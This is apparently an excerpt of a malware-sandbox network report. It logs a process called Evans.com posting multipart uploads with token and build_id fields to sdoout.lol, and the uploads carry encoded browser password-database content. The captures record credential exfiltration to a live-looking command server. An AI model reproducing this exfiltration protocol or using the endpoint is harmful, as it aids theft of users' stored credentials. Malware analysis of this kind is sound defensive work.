                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:21 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 67 76 6b 36 70 68 6c 78 74 6a 35 70 38 71 31 6e 79 35 38 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 67 76 6b 36 70 68 6c 78 74 6a 35 70 38 71 31 6e 79 35 38 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 67 76 6b 36 70 68 6c 78 74 6a 35 70 38 71 31 6e 79 35 38 79 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------gvk6phlxtj5p8q1ny58yContent-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------gvk6phlxtj5p8q1ny58yContent-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------gvk6phlxtj5p8q1ny58yCont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:21 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:22 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    19192.168.2.550025116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:22 UTC277OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----pph4eu37qieuaaasr9h4
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 55081
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:22 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 70 70 68 34 65 75 33 37 71 69 65 75 61 61 61 73 72 39 68 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 70 70 68 34 65 75 33 37 71 69 65 75 61 61 61 73 72 39 68 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 70 70 68 34 65 75 33 37 71 69 65 75 61 61 61 73 72 39 68 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------pph4eu37qieuaaasr9h4Content-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------pph4eu37qieuaaasr9h4Content-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------pph4eu37qieuaaasr9h4Cont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:22 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:22 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:22 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                    Date: Tue, 31 Dec 2024 08:46:23 GMT
                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:23 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                    20192.168.2.550026116.203.14.44432656C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:23 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----phlfc2ngvaaieusr9ri5
                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                                                                    Host: sdoout.lol
                                                                                                                                                                                                                                                                                                                                    Content-Length: 142457
                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:23 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 70 68 6c 66 63 32 6e 67 76 61 61 69 65 75 73 72 39 72 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 64 31 30 33 30 31 34 64 65 62 36 33 33 32 35 65 30 32 34 31 31 61 33 62 65 35 62 35 30 33 33 0d 0a 2d 2d 2d 2d 2d 2d 70 68 6c 66 63 32 6e 67 76 61 61 69 65 75 73 72 39 72 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 65 66 32 35 61 63 33 65 32 66 62 34 33 66 34 65 33 37 36 30 37 65 36 63 39 62 63 65 39 36 62 0d 0a 2d 2d 2d 2d 2d 2d 70 68 6c 66 63 32 6e 67 76 61 61 69 65 75 73 72 39 72 69 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                    Data Ascii: ------phlfc2ngvaaieusr9ri5Content-Disposition: form-data; name="token"8d103014deb63325e02411a3be5b5033------phlfc2ngvaaieusr9ri5Content-Disposition: form-data; name="build_id"8ef25ac3e2fb43f4e37607e6c9bce96b------phlfc2ngvaaieusr9ri5Cont
                                                                                                                                                                                                                                                                                                                                    2024-12-31 08:46:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
